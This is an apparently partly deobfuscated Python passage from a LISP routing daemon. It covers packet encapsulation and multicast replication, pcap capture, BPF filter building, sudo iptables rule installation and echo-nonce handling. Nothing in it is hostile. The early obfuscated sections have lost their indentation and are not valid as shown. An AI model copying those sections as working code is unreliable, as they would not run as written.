if 23 - 23: i11iIiiIii
if 39 - 39: o0oOOo0O0Ooo - I1ii11iIi11i % iII111i * OoO0O00 - OOooOOo / iII111i
if 29 - 29: I1ii11iIi11i
if 52 - 52: i11iIiiIii / i1IIi
if 1 - 1: ooOoO0o
# Copy inner QoS/TTL to the outer header before encapsulation.
packet . outer_tos = packet . inner_tos
packet . outer_ttl = packet . inner_ttl
if 78 - 78: I1ii11iIi11i + I11i - O0
if 10 - 10: I1Ii111 % I1IiiI
if 97 - 97: OoooooooOO - I1Ii111
if 58 - 58: iIii1I11I1II1 + O0
# Unicast case: encapsulate to the selected RLOC and transmit out the
# raw socket matching the outer address-family.
if ( iiIii1IIi ) :
packet . outer_dest . copy_address ( iiIii1IIi )
I111I11I111 = packet . outer_dest . afi_to_version ( )
packet . outer_version = I111I11I111
iiiiI11ii = lisp . lisp_myrlocs [ 0 ] if ( I111I11I111 == 4 ) else lisp . lisp_myrlocs [ 1 ]
if 96 - 96: iII111i . O0 / iII111i % O0
packet . outer_source . copy_address ( iiiiI11ii )
if 94 - 94: IiII + I1Ii111 / OOooOOo
if ( packet . is_trace ( ) ) :
if ( lisp . lisp_trace_append ( packet ) == False ) : return
if 91 - 91: I11i / i1IIi * i1IIi
if 25 - 25: iIii1I11I1II1 . OOooOOo * oO0o - Ii1I
if 55 - 55: OoOoOO00
if 63 - 63: IiII * OoOoOO00 * ooOoO0o
if 92 - 92: I1ii11iIi11i / O0
if ( packet . encode ( OOOoOo00O ) == None ) : return
if ( len ( packet . packet ) <= 1500 ) : packet . print_packet ( "Send" , True )
if 80 - 80: o0oOOo0O0Ooo - OOooOOo + OoooooooOO
if 98 - 98: OOooOOo + i1IIi . I1IiiI - II111iiii - o0oOOo0O0Ooo
if 24 - 24: Oo0Ooo - i1IIi + I11i
if 38 - 38: OoooooooOO / I1ii11iIi11i . O0 / i1IIi / Oo0Ooo + iIii1I11I1II1
ooO00O00oOO = Oooo0000 if I111I11I111 == 6 else Ii1IIii11
packet . send_packet ( ooO00O00oOO , packet . outer_dest )
if 40 - 40: iII111i . oO0o + I1IiiI + I1ii11iIi11i + I1Ii111
# Multicast case: replicate the packet to every RLE node at the first
# level, re-encapsulating per replica and restoring the inner packet
# (stripping the just-prepended outer header) between iterations.
elif ( OooO0oOo ) :
if 26 - 26: iIii1I11I1II1
if 87 - 87: I1ii11iIi11i / OoooooooOO - Oo0Ooo % OoOoOO00 % IiII % Oo0Ooo
if 29 - 29: OoooooooOO . I1IiiI % I1ii11iIi11i - iII111i
if 8 - 8: i1IIi
if 32 - 32: oO0o / II111iiii
II1Iii = OooO0oOo . rle_nodes [ 0 ] . level
O0oooo0OoO0oo = len ( packet . packet )
for IiiiIi1iI1iI in OooO0oOo . rle_forwarding_list :
if ( IiiiIi1iI1iI . level != II1Iii ) : return
if 98 - 98: OoO0O00 / OOooOOo * I1ii11iIi11i / oO0o
packet . outer_dest . copy_address ( IiiiIi1iI1iI . address )
if ( II1i1i1iII1 ) : packet . inner_dest . instance_id = 0xffffff
I111I11I111 = packet . outer_dest . afi_to_version ( )
packet . outer_version = I111I11I111
iiiiI11ii = lisp . lisp_myrlocs [ 0 ] if ( I111I11I111 == 4 ) else lisp . lisp_myrlocs [ 1 ]
if 64 - 64: oO0o - I1IiiI / iII111i - OoO0O00
packet . outer_source . copy_address ( iiiiI11ii )
if 37 - 37: i11iIiiIii / iII111i
if ( packet . is_trace ( ) ) :
if ( lisp . lisp_trace_append ( packet ) == False ) : return
if 85 - 85: i11iIiiIii + I1Ii111 * OoOoOO00
if 1 - 1: i1IIi / Oo0Ooo . OoO0O00
if ( packet . encode ( None ) == None ) : return
if 57 - 57: I11i . Oo0Ooo + II111iiii
if 43 - 43: I1Ii111 % iII111i
if 69 - 69: iII111i % OoO0O00
if 86 - 86: oO0o / oO0o
packet . print_packet ( "Replicate-to-L{}" . format ( IiiiIi1iI1iI . level ) , True )
packet . send_packet ( Ii1IIii11 , packet . outer_dest )
if 28 - 28: i11iIiiIii / o0oOOo0O0Ooo . iIii1I11I1II1 / II111iiii
if 72 - 72: OoooooooOO / I1IiiI + Ii1I / OoOoOO00 * Ii1I
if 34 - 34: O0 * O0 % OoooooooOO + iII111i * iIii1I11I1II1 % Ii1I
if 25 - 25: I11i + OoOoOO00 . o0oOOo0O0Ooo % OoOoOO00 * OOooOOo
if 32 - 32: i11iIiiIii - I1Ii111
# Strip the encapsulation header added by encode() so the next
# replica starts from the original inner packet again.
oo00ooOoo = len ( packet . packet ) - O0oooo0OoO0oo
packet . packet = packet . packet [ oo00ooOoo : : ]
if 28 - 28: Ii1I
if 1 - 1: Ii1I
if 48 - 48: O0 + O0 . I1Ii111 - ooOoO0o
if 63 - 63: oO0o
if 71 - 71: i1IIi . Ii1I * iII111i % OoooooooOO + OOooOOo
if 36 - 36: IiII
del ( packet )
return
if 49 - 49: OOooOOo / OoooooooOO / I1IiiI
if 74 - 74: I1Ii111 % I1ii11iIi11i
if 7 - 7: II111iiii
if 27 - 27: oO0o . OoooooooOO + i11iIiiIii
if 86 - 86: I11i / o0oOOo0O0Ooo - o0oOOo0O0Ooo + I1ii11iIi11i + oO0o
if 33 - 33: o0oOOo0O0Ooo . iII111i . IiII . i1IIi
if 49 - 49: I1ii11iIi11i
# pcap callback: called for every raw frame captured on 'device'.
# Determines the L2 header length ('lo0' loopback pseudo-header is 4
# bytes, Ethernet is 14), resolves the logical input interface and MAC
# info, handles VLAN tags and drops ARP, then hands the L3 payload to
# the data-plane routine IIIii().  'not_used' is the unused pcap
# user-data argument.
def O0oOOo0o ( device , not_used , packet ) :
if 50 - 50: iII111i . I1ii11iIi11i . OoO0O00 * I11i + II111iiii % i11iIiiIii
# Byte offset of the L3 packet within the captured frame.
i1i1IiIiIi1Ii = 4 if device == "lo0" else 14
if 64 - 64: OOooOOo + OoooooooOO * OoooooooOO
# Optionally log the first 64 bytes of the raw frame.
if ( lisp . lisp_frame_logging ) :
i1I = lisp . bold ( "Received frame on interface '{}'" . format ( device ) ,
False )
iiI1I1IIi11i1 = lisp . lisp_format_packet ( packet [ 0 : 64 ] )
lisp . lprint ( "{}: {}" . format ( i1I , iiI1I1IIi11i1 ) )
if 45 - 45: ooOoO0o % o0oOOo0O0Ooo - ooOoO0o
if 31 - 31: IiII / i11iIiiIii
if 83 - 83: I1ii11iIi11i / I1Ii111 - i11iIiiIii . iIii1I11I1II1 + Oo0Ooo
if 59 - 59: O0 % Oo0Ooo
if 92 - 92: Ii1I % iII111i / I1ii11iIi11i % I1ii11iIi11i * I1IiiI
# For Ethernet frames, resolve the logical input interface from the
# source MAC, format the MACs for logging, and widen the offset for a
# VLAN interface name.
Oo = ""
oO00oOOo0Oo = False
OOo0oO00ooO00 = device
if ( i1i1IiIiIi1Ii == 14 ) :
iIiIIi1 , IIiIIIIii , iI , oO00oOOo0Oo = lisp . lisp_get_input_interface ( packet )
OOo0oO00ooO00 = device if ( device in iIiIIi1 ) else iIiIIi1 [ 0 ]
Oo = lisp . lisp_format_macs ( IIiIIIIii , iI )
if ( OOo0oO00ooO00 . find ( "vlan" ) != - 1 ) : i1i1IiIiIi1Ii += 4
if 5 - 5: o0oOOo0O0Ooo . iIii1I11I1II1 % iIii1I11I1II1
if 56 - 56: OoooooooOO - I11i - i1IIi
if 8 - 8: I1Ii111 / OOooOOo . I1IiiI + I1ii11iIi11i / i11iIiiIii
if 31 - 31: ooOoO0o - iIii1I11I1II1 + iII111i . Oo0Ooo / IiII % iIii1I11I1II1
if 6 - 6: IiII * i11iIiiIii % iIii1I11I1II1 % i11iIiiIii + o0oOOo0O0Ooo / i1IIi
if 53 - 53: I11i + iIii1I11I1II1
# Low-order bit of the destination MAC's first octet set means a
# multicast/broadcast MAC -- flag it via oO00oOOo0Oo ('my_sa').
# NOTE(review): 'iI' is only assigned in the offset==14 branch above;
# this line presumably belongs to that branch -- indentation is not
# visible here, confirm against the original file.
if ( int ( iI [ 1 ] , 16 ) & 1 ) : oO00oOOo0Oo = True
if 70 - 70: I1ii11iIi11i
if 67 - 67: OoooooooOO
if 29 - 29: O0 - i11iIiiIii - II111iiii + OOooOOo * IiII
if 2 - 2: i1IIi - ooOoO0o + I1IiiI . o0oOOo0O0Ooo * o0oOOo0O0Ooo / OoOoOO00
if 93 - 93: i1IIi
# Read the ethertype preceding the payload: 0x8100 means a 802.1Q tag
# (derive the vlan interface name and skip the 4-byte tag); 0x806 is
# ARP which the kernel should handle, so drop it here.
ooOOOo = struct . unpack ( "H" , packet [ i1i1IiIiIi1Ii - 2 : i1i1IiIiIi1Ii ] ) [ 0 ]
ooOOOo = socket . ntohs ( ooOOOo )
if ( ooOOOo == 0x8100 ) :
OO000oOoo0O = struct . unpack ( "I" , packet [ i1i1IiIiIi1Ii : i1i1IiIiIi1Ii + 4 ] ) [ 0 ]
OO000oOoo0O = socket . ntohl ( OO000oOoo0O )
OOo0oO00ooO00 = "vlan" + str ( OO000oOoo0O >> 16 )
i1i1IiIiIi1Ii += 4
elif ( ooOOOo == 0x806 ) :
lisp . dprint ( "Dropping ARP packets, host should have default route" )
return
if 9 - 9: oO0o * i1IIi - i1IIi
if 16 - 16: I1IiiI * i1IIi - o0oOOo0O0Ooo . IiII % I11i / o0oOOo0O0Ooo
# L2 overlays keep the whole frame (MAC header included).
if ( lisp . lisp_l2_overlay ) : i1i1IiIiIi1Ii = 0
if 14 - 14: iIii1I11I1II1 * I1Ii111 * I1ii11iIi11i / iIii1I11I1II1 * IiII / I11i
# Hand the L3 payload to the data-plane processing routine.
IIIii ( packet [ i1i1IiIiIi1Ii : : ] , device , OOo0oO00ooO00 , Oo , oO00oOOo0Oo )
return
if 77 - 77: OoO0O00 + I1Ii111 + I1Ii111 * Ii1I / OoooooooOO . Ii1I
if 62 - 62: i1IIi - i1IIi
if 69 - 69: OoOoOO00 % oO0o - I11i
if 38 - 38: iIii1I11I1II1 + i11iIiiIii / i11iIiiIii % OoO0O00 / ooOoO0o % Ii1I
if 7 - 7: IiII * I1IiiI + i1IIi + i11iIiiIii + Oo0Ooo % I1IiiI
if 62 - 62: o0oOOo0O0Ooo - Ii1I * OoOoOO00 - i11iIiiIii % ooOoO0o
if 52 - 52: I1ii11iIi11i % oO0o - i11iIiiIii
if 30 - 30: iII111i / OoO0O00 + oO0o
if 6 - 6: iII111i . I11i + Ii1I . I1Ii111
if 70 - 70: OoO0O00
if 46 - 46: I11i - i1IIi
if 46 - 46: I1Ii111 % Ii1I
if 72 - 72: iIii1I11I1II1
if 45 - 45: Oo0Ooo - o0oOOo0O0Ooo % I1Ii111
if 38 - 38: I1Ii111 % OOooOOo - OoooooooOO
if 87 - 87: OoO0O00 % I1IiiI
if 77 - 77: iIii1I11I1II1 - i1IIi . oO0o
if 26 - 26: o0oOOo0O0Ooo * IiII . i1IIi
if 59 - 59: O0 + i1IIi - o0oOOo0O0Ooo
if 62 - 62: i11iIiiIii % OOooOOo . IiII . OOooOOo
if 84 - 84: i11iIiiIii * OoO0O00
if 18 - 18: OOooOOo - Ii1I - OoOoOO00 / I1Ii111 - O0
if 30 - 30: O0 + I1ii11iIi11i + II111iiii
if 14 - 14: o0oOOo0O0Ooo / OOooOOo - iIii1I11I1II1 - oO0o % ooOoO0o
if 49 - 49: ooOoO0o * oO0o / o0oOOo0O0Ooo / Oo0Ooo * iIii1I11I1II1
if 57 - 57: OoOoOO00 - oO0o / ooOoO0o % i11iIiiIii
if 3 - 3: iII111i . ooOoO0o % I1IiiI + I1ii11iIi11i
if 64 - 64: i1IIi
if 29 - 29: o0oOOo0O0Ooo / i11iIiiIii / I1IiiI % oO0o % i11iIiiIii
if 18 - 18: OOooOOo + I1Ii111
if 80 - 80: oO0o + o0oOOo0O0Ooo * Ii1I + OoO0O00
if 75 - 75: I11i / o0oOOo0O0Ooo / OOooOOo / IiII % ooOoO0o + II111iiii
if 4 - 4: iII111i - Oo0Ooo - IiII - I11i % i11iIiiIii / OoO0O00
if 50 - 50: ooOoO0o + i1IIi
if 31 - 31: Ii1I
if 78 - 78: i11iIiiIii + o0oOOo0O0Ooo + I1Ii111 / o0oOOo0O0Ooo % iIii1I11I1II1 % IiII
if 83 - 83: iIii1I11I1II1 % OoOoOO00 % o0oOOo0O0Ooo % I1Ii111 . I1ii11iIi11i % O0
def OO0oOOoo ( sources , dyn_eids ) :
    """Install iptables/ip6tables rules in the 'raw' table so the kernel
    does not natively forward EID-sourced packets this ITR must
    encapsulate.

    sources  - list of EID-prefix strings from database-mappings
    dyn_eids - subset of 'sources' that are dynamic-EID prefixes

    Setting environment variable LISP_NO_IPTABLES suppresses everything;
    LISP_VIRTIO_BUG additionally installs checksum-fill rules to work
    around the virtio TX-checksum bug.
    """
    if (os.getenv("LISP_NO_IPTABLES") != None):
        lisp.lprint("User selected to suppress installing iptables rules")
        return
    #endif

    # Create the 'lisp' chain and jump to it from PREROUTING (v4 and v6).
    os.system("sudo iptables -t raw -N lisp")
    os.system("sudo iptables -t raw -A PREROUTING -j lisp")
    os.system("sudo ip6tables -t raw -N lisp")
    os.system("sudo ip6tables -t raw -A PREROUTING -j lisp")

    # Always accept loopback, multicast/link-local control ranges, our
    # EID-prefixes, and every address configured on this system.
    accept = "sudo ip{}tables -t raw -A lisp -j ACCEPT -d {}"
    dest_list = ["127.0.0.1", "::1", "224.0.0.0/4 -p igmp", "ff00::/8",
        "fe80::/16"]
    dest_list += sources + lisp.lisp_get_all_addresses()
    for dest in dest_list:
        v6 = "" if dest.find(":") == -1 else "6"
        os.system(accept.format(v6, dest))
    #endfor

    # Accept EID-to-EID traffic within the same address-family (skipping
    # dynamic-EID prefixes) unless we are a PITR.  The -C check avoids
    # installing duplicate rules.
    if (lisp.lisp_pitr == False):
        add = "sudo ip{}tables -t raw -A lisp -j ACCEPT -s {} -d {}"
        check = "sudo ip{}tables -t raw -C lisp -j ACCEPT -s {} -d {}"
        for src in sources:
            if (src in dyn_eids): continue
            v6 = "" if src.find(":") == -1 else "6"
            for dst in sources:
                if (dst in dyn_eids): continue
                if (dst.find(".") != -1 and src.find(".") == -1): continue
                if (dst.find(":") != -1 and src.find(":") == -1): continue
                if (commands.getoutput(check.format(v6, src, dst)) == ""):
                    continue
                #endif
                os.system(add.format(v6, src, dst))
            #endfor
        #endfor
    #endif

    # Everything else sourced from an EID is dropped -- this process, not
    # the kernel, must forward (encapsulate) those packets.
    drop = "sudo ip{}tables -t raw -A lisp -j DROP -s {}"
    for src in sources:
        v6 = "" if src.find(":") == -1 else "6"
        os.system(drop.format(v6, src))
    #endfor

    # Log the rule set that ended up installed.
    rules = commands.getoutput("sudo iptables -t raw -S lisp").split("\n")
    rules += commands.getoutput("sudo ip6tables -t raw -S lisp").split("\n")
    lisp.lprint("Using kernel filters: {}".format(rules))

    # virtio TX-checksum bug workaround: have netfilter fill in TCP/UDP
    # checksums on output for both address families.
    if (os.getenv("LISP_VIRTIO_BUG") != None):
        fill = ("sudo iptables -A POSTROUTING -t mangle -p tcp -j " +
            "CHECKSUM --checksum-fill; ")
        fill += ("sudo iptables -A POSTROUTING -t mangle -p udp -j " +
            "CHECKSUM --checksum-fill; ")
        fill += ("sudo ip6tables -A POSTROUTING -t mangle -p tcp -j " +
            "CHECKSUM --checksum-fill; ")
        fill += ("sudo ip6tables -A POSTROUTING -t mangle -p udp -j " +
            "CHECKSUM --checksum-fill")
        os.system(fill)
        tag = lisp.bold("virtio", False)
        lisp.lprint("{} bug workaround, configure '{}'".format(tag, fill))
    #endif
    return
if 20 - 20: oO0o * O0 + I11i - OoooooooOO . I11i
if 60 - 60: o0oOOo0O0Ooo . o0oOOo0O0Ooo / iII111i
if 45 - 45: O0 . i11iIiiIii % iII111i . OoOoOO00 % IiII % iIii1I11I1II1
if 58 - 58: iIii1I11I1II1 . OoOoOO00 - i11iIiiIii * iIii1I11I1II1 % i11iIiiIii / I1IiiI
if 80 - 80: I1ii11iIi11i / iIii1I11I1II1 % OoOoOO00
if 80 - 80: OoO0O00 % iII111i
if 99 - 99: ooOoO0o / iIii1I11I1II1 - Ii1I * I1ii11iIi11i % I1IiiI
def o00oOo0oOoo ( sources , dyn_eids , l2_overlay , pitr ) :
    """Build and return the pcap/BPF filter string for capture threads.

    sources    - EID-prefix strings from database-mappings
    dyn_eids   - subset of 'sources' that are dynamic-EID prefixes
    l2_overlay - True when running an L2 overlay (capture everything)
    pitr       - True when running as a PITR (capture all destinations)
    """
    # L2 overlay: capture every Ethernet frame.
    if (l2_overlay):
        bpf = "ether[6:4] >= 0 and ether[10:2] >= 0"
        lisp.lprint("Using pcap filter: '{}'".format(bpf))
        return(bpf)
    #endif

    # Base clauses: no ARP; plus RLOC-probe replies and LISP-Decent
    # multicast control packets appended at the end.
    no_arp = "(not ether proto 0x806)"
    probes = " or (udp src port 4342 and ip[28] == 0x28)"
    decent = " or (ip[16] >= 224 and ip[16] < 240 and (ip[28] & 0xf0) == 0x30)"

    # Build "a or b or ..." lists of source EIDs and (non-dynamic)
    # destination EIDs.  The trailing " or " on the dst list is trimmed
    # because a dynamic-EID last element does not append one itself.
    src_eids = ""
    dst_eids = ""
    for eid in sources:
        src_eids += "{}".format(eid)
        if (eid not in dyn_eids): dst_eids += "{}".format(eid)
        if (sources[-1] == eid): break
        src_eids += " or "
        if (eid not in dyn_eids): dst_eids += " or "
    #endfor
    if (dst_eids[-4::] == " or "): dst_eids = dst_eids[0:-4]

    # When lisp-nat is configured, the loopback translation address must
    # stay out of the excluded local-address list.
    nat = commands.getoutput("egrep 'lisp-nat = yes' ./lisp.config")
    nat = (nat != "" and nat[0] == " ")
    skip_addr = lisp.lisp_get_loopback_address() if (nat) else None

    # "a or b or ..." list of all local addresses to exclude.
    local_addrs = ""
    addr_list = lisp.lisp_get_all_addresses()
    for addr in addr_list:
        if (addr == skip_addr): continue
        local_addrs += "{}".format(addr)
        if (addr_list[-1] == addr): break
        local_addrs += " or "
    #endfor

    # Wrap each list in its BPF clause.
    if (src_eids != ""):
        src_eids = " and (src net {})".format(src_eids)
    #endif
    if (dst_eids != ""):
        dst_eids = " and not (dst net {})".format(dst_eids)
    #endif
    if (local_addrs != ""):
        local_addrs = " and not (dst host {})".format(local_addrs)
    #endif

    # A PITR captures packets to any destination, and excludes local
    # addresses as both source and destination.
    if (pitr):
        dst_eids = ""
        local_addrs = local_addrs.replace("dst ", "")
    #endif

    bpf = no_arp + src_eids + dst_eids + local_addrs
    bpf += probes
    bpf += decent

    lisp.lprint("Using pcap filter: '{}'".format(bpf))
    return(bpf)
if 50 - 50: OoOoOO00
if 33 - 33: I11i
if 98 - 98: OoOoOO00 % II111iiii
if 95 - 95: iIii1I11I1II1 - I1Ii111 - OOooOOo + I1Ii111 % I1ii11iIi11i . I1IiiI
if 41 - 41: O0 + oO0o . i1IIi - II111iiii * o0oOOo0O0Ooo . OoO0O00
if 68 - 68: o0oOOo0O0Ooo
if 20 - 20: I1Ii111 - I1Ii111
def iIi1 ( device , pfilter , pcap_lock ) :
    """Thread entry point: run a packet-capture loop on one interface.

    Opens 'device' via pcappy, installs BPF filter 'pfilter', then loops
    forever handing each captured frame to the pcap callback O0oOOo0o.
    'pcap_lock' serializes pcappy open calls across capture threads.
    """
    lisp.lisp_set_exception()

    pcap_lock.acquire()
    handle = pcappy.open_live(device, 9000, 0, 100)
    pcap_lock.release()

    handle.filter = pfilter
    handle.loop(-1, O0oOOo0o, device)
    return
if 43 - 43: I1ii11iIi11i . i1IIi . IiII + O0 * Ii1I * O0
if 41 - 41: I1ii11iIi11i + Ii1I % OoooooooOO . I1ii11iIi11i + iII111i . iII111i
if 31 - 31: i11iIiiIii + II111iiii . iII111i * OoOoOO00
if 66 - 66: OoOoOO00 + i1IIi % II111iiii . O0 * I1ii11iIi11i % I1ii11iIi11i
if 87 - 87: OOooOOo + o0oOOo0O0Ooo . iII111i - OoooooooOO
if 6 - 6: iIii1I11I1II1 * OoooooooOO
if 28 - 28: Oo0Ooo * o0oOOo0O0Ooo / I1Ii111
if 52 - 52: O0 / o0oOOo0O0Ooo % iII111i * I1IiiI % OOooOOo
if 69 - 69: I1ii11iIi11i
def oOOO0ooo ( ) :
    """Timer callback: send NAT-traversal Info-Requests to map-servers
    and re-arm the timer for the next LISP_INFO_INTERVAL round."""
    global I11
    global II1Ii1iI1i
    global II1iII1i

    lisp.lisp_set_exception()

    # Send Info-Requests on the ephemeral NAT socket (listed twice, for
    # both address families) plus the IPC socket.
    nat_sockets = [II1Ii1iI1i, II1Ii1iI1i, oO0oIIII]
    lisp.lisp_build_info_requests(nat_sockets, None, lisp.LISP_CTRL_PORT)

    # Cancel any pending timer and schedule the next cycle.
    I11.cancel()
    I11 = threading.Timer(lisp.LISP_INFO_INTERVAL,
        oOOO0ooo, [])
    I11.start()
    return
if 71 - 71: I1IiiI . II111iiii . I1IiiI - ooOoO0o
if 45 - 45: IiII / O0 / OoOoOO00 * OOooOOo
if 18 - 18: iIii1I11I1II1 + OOooOOo + iIii1I11I1II1 . I1ii11iIi11i + I1Ii111 . ooOoO0o
if 7 - 7: I1ii11iIi11i + iIii1I11I1II1 * I11i * I11i / II111iiii - Ii1I
if 65 - 65: oO0o + OoOoOO00 + II111iiii
if 77 - 77: II111iiii
if 50 - 50: O0 . O0 . ooOoO0o % Oo0Ooo
def ooo000oOO ( kv_pair ) :
    """Process a 'lisp map-resolver' command clause.

    Delegates to the shared lispconfig handler, then (unless one is
    already running) starts a one-shot timer to test reachability of the
    configured map-resolvers, and triggers an immediate Info-Request
    cycle.
    """
    global II1iII1i
    global iiI1iIiI
    global I11

    lispconfig.lisp_map_resolver_command(kv_pair)

    # Schedule a map-resolver test in 2 seconds if none is pending.
    timer = lisp.lisp_test_mr_timer
    if (timer is None or not timer.is_alive()):
        lisp.lisp_test_mr_timer = threading.Timer(2, lisp.lisp_test_mr,
            [II1iII1i, iiI1iIiI])
        lisp.lisp_test_mr_timer.start()
    #endif

    # Fire the Info-Request timer routine right away.
    I11 = threading.Timer(0, oOOO0ooo, [])
    I11.start()
    return
if 87 - 87: II111iiii * I1ii11iIi11i % Oo0Ooo * Oo0Ooo
if 58 - 58: OOooOOo . o0oOOo0O0Ooo + I1IiiI % Oo0Ooo - OoO0O00
if 50 - 50: iII111i % II111iiii - ooOoO0o . i1IIi + O0 % iII111i
if 10 - 10: iII111i . i1IIi + Ii1I
if 66 - 66: OoO0O00 % o0oOOo0O0Ooo
if 21 - 21: OoOoOO00 - OoooooooOO % i11iIiiIii
if 71 - 71: i1IIi - I11i * I1Ii111 + oO0o - OoO0O00 % I1ii11iIi11i
if 63 - 63: iIii1I11I1II1 + OOooOOo . OoO0O00 / I1IiiI
def oO0O ( kv_pair ) :
    """Process a 'lisp database-mapping' command clause by delegating to
    the shared lispconfig handler."""
    lispconfig.lisp_database_mapping_command(kv_pair)
    return
if 26 - 26: iIii1I11I1II1 + i1IIi / OoOoOO00 % I1ii11iIi11i
if 44 - 44: OoooooooOO . II111iiii . OOooOOo % OoooooooOO
if 86 - 86: i11iIiiIii + O0 * IiII - OoO0O00 * OOooOOo + O0
if 95 - 95: iIii1I11I1II1 . I1Ii111 % iII111i - I1Ii111 * II111iiii
if 89 - 89: iII111i . I1IiiI
if 59 - 59: i1IIi % iIii1I11I1II1 + OoooooooOO
if 97 - 97: I1ii11iIi11i / Oo0Ooo + I1Ii111
if 32 - 32: ooOoO0o % I1Ii111 * Oo0Ooo
def O0O000oOo0O ( kv_pair ) :
    """Process a 'lisp xtr-parameters' command clause.

    Snapshots the nat-traversal and rloc-probing flags, applies the
    command, then reacts to False->True transitions: kick off RLOC
    probing, publish the lisp-crypto ephemeral port the first time
    data-plane security comes on, and push logging parameters to the
    external data-plane.
    """
    global i111I

    # Pre-command state, to detect features that just turned on.
    had_nat_traversal = lisp.lisp_nat_traversal
    had_rloc_probing = lisp.lisp_rloc_probing

    lispconfig.lisp_xtr_command(kv_pair)

    nat_just_on = (had_nat_traversal == False and lisp.lisp_nat_traversal and
        lisp.lisp_rloc_probing)
    probing_just_on = (had_rloc_probing == False and lisp.lisp_rloc_probing)

    # Probe soon when probing was just enabled; wait longer when NAT
    # traversal also came on so Info-Replies can arrive first.
    delay = 0
    if (probing_just_on): delay = 1
    if (nat_just_on): delay = 5

    if (delay != 0):
        probe_sockets = [i111I, i111I]
        lisp.lisp_start_rloc_probe_timer(delay, probe_sockets)
    #endif

    # First time data-plane security is on, record and advertise the
    # ephemeral port used for lisp-crypto packets.
    if (lisp.lisp_crypto_ephem_port == None and lisp.lisp_data_plane_security):
        port = i111I.getsockname()[1]
        lisp.lisp_crypto_ephem_port = port
        lisp.lprint("Use port {} for lisp-crypto packets".format(port))
        ipc_entry = {"type": "itr-crypto-port", "port": port}
        lisp.lisp_write_to_dp_socket(ipc_entry)
    #endif

    # Keep the external data-plane's logging settings in sync.
    lisp.lisp_ipc_write_xtr_parameters(lisp.lisp_debug_logging,
        lisp.lisp_data_plane_logging)
    return
if 48 - 48: ooOoO0o * OoOoOO00 - ooOoO0o - OOooOOo + OOooOOo
if 40 - 40: i11iIiiIii . iIii1I11I1II1
if 2 - 2: i1IIi * oO0o - oO0o + OoooooooOO % OoOoOO00 / OoOoOO00
if 3 - 3: OoooooooOO
if 71 - 71: IiII + i1IIi - iII111i - i11iIiiIii . I11i - ooOoO0o
if 85 - 85: I1ii11iIi11i - OoOoOO00 / I1ii11iIi11i + OOooOOo - iII111i
if 49 - 49: OoO0O00 - O0 / OoO0O00 * OoOoOO00 + I1Ii111
if 35 - 35: II111iiii . I1IiiI / i1IIi / I1IiiI * oO0o
if 85 - 85: II111iiii . ooOoO0o % OOooOOo % I11i
# Process a nonce-related IPC message handed up from the data plane.
# (Machine-obfuscated source: the identifiers below are generator output;
# only comments are added here, code tokens are unchanged.)
# The IPC string has the form "<op>%<R|E>%<rloc>%<nonce-hex>":
#   "R": the peer requested a nonce echo -- record it and start echoing.
#   "E": the peer echoed a nonce back -- if it matches the request-nonce we
#        sent, leave request-nonce mode and stamp the last good echo time.
def OOo00ooOoO0o(ipc):
    # Split "op % R/E % rloc % nonce"; the nonce travels as hex text.
    i1i1iiIIiiiII, Ii1I1, OO0ooO0, OOOoOo00O = ipc.split("%")
    OOOoOo00O = int(OOOoOo00O, 16)
    if 95 - 95: iIii1I11I1II1 . IiII - OoooooooOO * OoO0O00 / o0oOOo0O0Ooo
    # Look up (or lazily create) the echo-nonce state for this RLOC.
    oOo0OO0o0 = lisp.lisp_get_echo_nonce(None, OO0ooO0)
    if (oOo0OO0o0 == None): oOo0OO0o0 = lisp.lisp_echo_nonce(OO0ooO0)
    if 35 - 35: Oo0Ooo . Oo0Ooo % OoooooooOO - Ii1I
    if 43 - 43: OoO0O00 % OoO0O00
    if 46 - 46: Oo0Ooo % iIii1I11I1II1 . iII111i . O0 * ooOoO0o / OoooooooOO
    if 7 - 7: oO0o - O0 * I11i - o0oOOo0O0Ooo - II111iiii
    if 41 - 41: I1IiiI - I1Ii111 % II111iiii . I1Ii111 - I11i
    # "R": remember the peer's request-nonce and begin echoing it back.
    if (Ii1I1 == "R"):
        oOo0OO0o0.request_nonce_rcvd = OOOoOo00O
        oOo0OO0o0.last_request_nonce_rcvd = lisp.lisp_get_timestamp()
        oOo0OO0o0.echo_nonce_sent = OOOoOo00O
        oOo0OO0o0.last_new_echo_nonce_sent = lisp.lisp_get_timestamp()
        lisp.lprint("Start echo-nonce mode for {}, nonce 0x{}".format(lisp.red(oOo0OO0o0.rloc_str, False), lisp.lisp_hex_string(OOOoOo00O)))
    if 45 - 45: Ii1I - OOooOOo
    if 70 - 70: OoO0O00 % I1IiiI / I1IiiI . I11i % ooOoO0o . II111iiii
    if 10 - 10: Ii1I - i11iIiiIii . I1ii11iIi11i % i1IIi
    # "E": the peer echoed a nonce back to us.
    if (Ii1I1 == "E"):
        oOo0OO0o0.echo_nonce_rcvd = OOOoOo00O
        oOo0OO0o0.last_echo_nonce_rcvd = lisp.lisp_get_timestamp()
        if 78 - 78: iIii1I11I1II1 * Oo0Ooo . Oo0Ooo - OOooOOo . iIii1I11I1II1
        if (oOo0OO0o0.request_nonce_sent == OOOoOo00O):
            # Round-trip completed: the echo matches the nonce we requested.
            I111I1I = lisp.bold("echoed nonce", False)
            lisp.lprint("Received {} {} from {}".format(I111I1I,
                lisp.lisp_hex_string(OOOoOo00O),
                lisp.red(oOo0OO0o0.rloc_str, False)))
            if 54 - 54: II111iiii + I11i % I11i % o0oOOo0O0Ooo
            oOo0OO0o0.request_nonce_sent = None
            lisp.lprint("Stop request-nonce mode for {}".format(lisp.red(oOo0OO0o0.rloc_str, False)))
            if 25 - 25: iII111i - Oo0Ooo
            oOo0OO0o0.last_good_echo_nonce_rcvd = lisp.lisp_get_timestamp()
        else:
            # Mismatch: log what arrived vs. the request-nonce outstanding.
            Iii1IIIIIII = "none"
            if (oOo0OO0o0.request_nonce_sent):
                Iii1IIIIIII = lisp.lisp_hex_string(oOo0OO0o0.request_nonce_sent)
            if 27 - 27: OoO0O00 + OoOoOO00 * ooOoO0o
            lisp.lprint(("Received echo-nonce 0x{} from {}, but request-" + "nonce is {}").format(lisp.lisp_hex_string(OOOoOo00O),
                # iIii1I11I1II1 . iIii1I11I1II1 % IiII % i1IIi . OoOoOO00
                lisp.red(oOo0OO0o0.rloc_str, False), Iii1IIIIIII))
        if 75 - 75: ooOoO0o + OoO0O00 - I1ii11iIi11i . OoooooooOO . ooOoO0o + I1IiiI
    if 49 - 49: I1ii11iIi11i . IiII . i1IIi * OoOoOO00 % iIii1I11I1II1
    return
if 35 - 35: I1ii11iIi11i + I1Ii111 - OoOoOO00 % oO0o % o0oOOo0O0Ooo % OoOoOO00
